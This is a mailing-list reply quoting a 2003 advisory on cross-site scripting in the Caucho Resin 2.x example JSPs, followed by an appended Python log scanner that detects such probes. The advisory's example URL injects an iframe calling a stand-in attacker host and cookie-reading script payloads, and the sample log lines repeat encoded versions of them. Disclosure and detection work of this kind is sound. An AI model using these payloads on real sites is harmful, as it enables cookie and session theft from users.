Full Disclosure mailing list archives
Re: Caucho Resin 2.x - Cross Site Scripting
From: jelmer <jkuperus () planet nl>
Date: Sun, 19 Oct 2003 21:22:40 +0200
Donny,

These are in the example applications, which any sane admin should disable right away, much like caucho-status. These are basic procedures in setting up a server.

--jelmer

----- Original Message -----
From: "morning_wood" <se_cur_ity () hotmail com>
To: <full-disclosure () lists netsys com>
Sent: Sunday, October 19, 2003 12:37 PM
Subject: [Full-disclosure] Caucho Resin 2.x - Cross Site Scripting
-----------------------------------------------------------------
- EXPL-A-2003-026 exploitlabs.com Advisory 026 -
-----------------------------------------------------------------

-= Caucho Resin =-

Donnie Werner
Oct 18, 2003

Vulnerability(s):
----------------
1. XSS

note: this is not
http://www.securiteam.com/securitynews/5KP0O1F7FM.html
http://www.securitytracker.com/alerts/2002/Jun/1004552.html

Product:
--------
Caucho Resin Httpd 2.x

Reviews:
--------
http://www.caucho.com/sales/customers.xtp

Description of product:
-----------------------
"Resin® is a cutting-edge XML Application Server. It serves the fastest servlets and JSP."

VULNERABILITY / EXPLOIT
======================
default port 8080 ( others used )

affected scripts:
env.jsp
form.jsp
session.jsp
tictactoe.jsp

http://[host]:8080/examples/tictactoe/tictactoe.jsp?move=<iframe%20src="http://attcker/evil.cgi"></iframe>4

or

<SCRIPT>alert(document.domain);</SCRIPT><SCRIPT>alert(document.cookie);</SCRIPT>

the above is only an example, all cookie and session stealing Cross Site Scripting was possible.

guestbook.jsp allows persistent XSS
enter evil javascript in "name" and "comment" fields
it is then re-rendered upon revisit

Local:
------
nay

Remote:
-------
yeh

Vendor Fix:
-----------
Versions 3.x don't have the examples included

Vendor Contact:
---------------
bugs () caucho com
Concurrent with this advisory

Credits:
--------
Donnie Werner
CTO E2 Labs
http://e2-labs.cpm
morning_wood () e2-labs com
http://nothackers.org

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
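As an added defender-side example (not part of this thread and not Caucho's code): a small Python access-log check that flags requests to the Resin 2.x example JSPs named in the advisory whenever a query parameter carries tag markup, so an admin can see whether the examples webapp is still deployed and being probed. The log lines and the host attacker.invalid are constructed for the demonstration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Example JSPs named in the advisory; they ship with Resin 2.x under /examples/.
EXAMPLE_JSPS = {"env.jsp", "form.jsp", "session.jsp", "tictactoe.jsp", "guestbook.jsp"}

# Tags that have no business inside a query parameter of these pages.
TAG_RE = re.compile(r"<\s*/?\s*(script|iframe|object|embed|img)\b", re.IGNORECASE)

# Common Log Format: ip ident user [timestamp] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

def injected_params(target):
    """Return (name, decoded value) pairs whose value contains HTML tag markup."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        decoded = unquote(value)  # parse_qsl decodes once; decode again for double-encoded probes
        if TAG_RE.search(decoded):
            hits.append((name, decoded))
    return hits

def scan_access_log(lines):
    """Flag requests to the Resin example JSPs that carry tag markup in a parameter."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a CLF line; skip
        path = urlsplit(m.group("target")).path
        if path.startswith("/examples/") and path.rsplit("/", 1)[-1] in EXAMPLE_JSPS:
            hits = injected_params(m.group("target"))
            if hits:
                findings.append({"ip": m.group("ip"), "path": path, "params": hits})
    return findings

# Constructed sample lines (not real traffic); payloads are percent-encoded as a browser sends them.
SAMPLE_LOG = [
    '10.0.0.5 - - [19/Oct/2003:12:37:01 +0200] "GET /examples/tictactoe/tictactoe.jsp?move=4 HTTP/1.0" 200 812',
    '10.0.0.5 - - [19/Oct/2003:12:37:09 +0200] "GET /examples/tictactoe/tictactoe.jsp?move=%3Ciframe%20src%3D%22http://attacker.invalid/x%22%3E%3C/iframe%3E4 HTTP/1.0" 200 901',
    '10.0.0.7 - - [19/Oct/2003:12:38:15 +0200] "GET /examples/form.jsp?name=%3CSCRIPT%3Ealert(document.cookie)%3C/SCRIPT%3E HTTP/1.0" 200 640',
    '10.0.0.9 - - [19/Oct/2003:12:39:00 +0200] "GET /shop/index.jsp?q=%3Cscript%3E HTTP/1.0" 404 220',
]

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f["ip"], f["path"], f["params"])
```

The guestbook.jsp persistent case is submitted in a POST body, which an access log does not record, so this check only covers the reflected, query-string variants; removing the examples webapp, as the reply advises, is the actual fix.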